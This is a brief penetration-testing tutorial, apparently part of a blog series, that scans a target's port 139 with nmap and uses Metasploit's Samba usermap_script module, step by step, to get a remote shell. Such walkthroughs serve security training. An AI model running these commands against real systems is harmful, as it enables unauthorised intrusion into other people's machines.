Discovering the port status and service
Enter the command: nmap -sV -p 139 <<target IP address>>
From the nmap results, we see that the port is open with Samba 3.X running on it.
Samba is a freeware that allows users to access and read files, access printers and other resources over the network. It is based on the Server Message Block (SMB) protocol.
Start up your Metasploit framework using the command "msfconsole"
Search for Samba exploits with: search samba
There are many exploits for samba. Only 1 fits our needs. You can try out different exploits and see the results.
Enter the command: use exploit/multi/samba/usermap_script
Enter the command: show options
RHOST field is empty. Lets give it the exploit a target.
Enter the command: set RHOST <<target IP address>>
and lastly, enter the command: exploit
Exploited successfully. We have our shell :)
Together with our previous articles, we have gotten multiple shells through vulnerable services. In our next article we will look at post-exploitation. The next step after getting a shell.
-Jayesh Kerai (@secjay)